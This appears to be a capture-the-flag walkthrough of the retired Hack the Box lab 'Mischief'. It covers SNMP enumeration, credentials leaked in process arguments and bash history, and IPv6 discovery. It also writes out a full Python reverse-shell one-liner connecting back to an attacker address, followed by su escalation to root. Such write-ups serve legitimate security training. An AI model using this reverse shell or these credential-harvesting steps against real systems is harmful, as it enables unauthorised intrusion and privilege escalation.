HTB – Mischief

Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with our nmap Aggressive scan to find out the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Because we were knowing SNMP service is enable in the network, therefore I run nmap script command for SNMP enumeration.

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Hmmm!! So here I found something very interesting and it looks like the login credential to be used as authentication to connect port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki
Password: godofmischiefisloki

Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
# #
# ####### ## # # # # # #
# # # # # # # # # #
# ###### # # # ## ## #
# # # # # ## # # #
# ###### # ## ## # # #
# #
# SNMP IPv6 Enumerator Tool #
# #
# Author: Thanasis Tserpelis aka Trickster0 #
# #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds

So we navigate to the web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.

Access Victim’s Shell

 

Further, I try brute force for username and successfully get login with the following combination:

Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploited and we can own reverse shell of the target machine.

But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell, I use python reverse shellcode from pentestmonkey, and modify lhost IP from our IPv6 address. Since both nodes belong to IPv6, therefore we need a listener which can establish a reverse connection such as ncat, therefore we started ncat as the listener on port 443

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon we will execute the malicious python code, we will get a reverse connection via ncat  or nc6.exe from https://www.sphinx-soft.com/tools/index.html

Great!! You can observe that we have access to remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

As port 22 was running, therefore we connect to the remote machine through ssh and successfully found user.txt file

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.

Therefore, we move back to www-data user shell to run switch user command and enter the above-found password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command, we try to enumerate the path of root.txt.

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *